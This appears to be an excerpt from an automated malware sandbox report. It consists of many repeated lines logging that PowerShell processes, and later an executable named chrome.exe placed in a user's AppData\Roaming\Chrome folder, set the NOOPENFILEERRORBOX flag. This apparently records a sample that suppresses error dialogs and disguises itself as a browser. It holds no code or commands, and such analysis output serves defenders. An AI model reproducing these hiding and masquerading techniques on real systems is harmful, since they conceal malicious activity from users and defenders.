Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
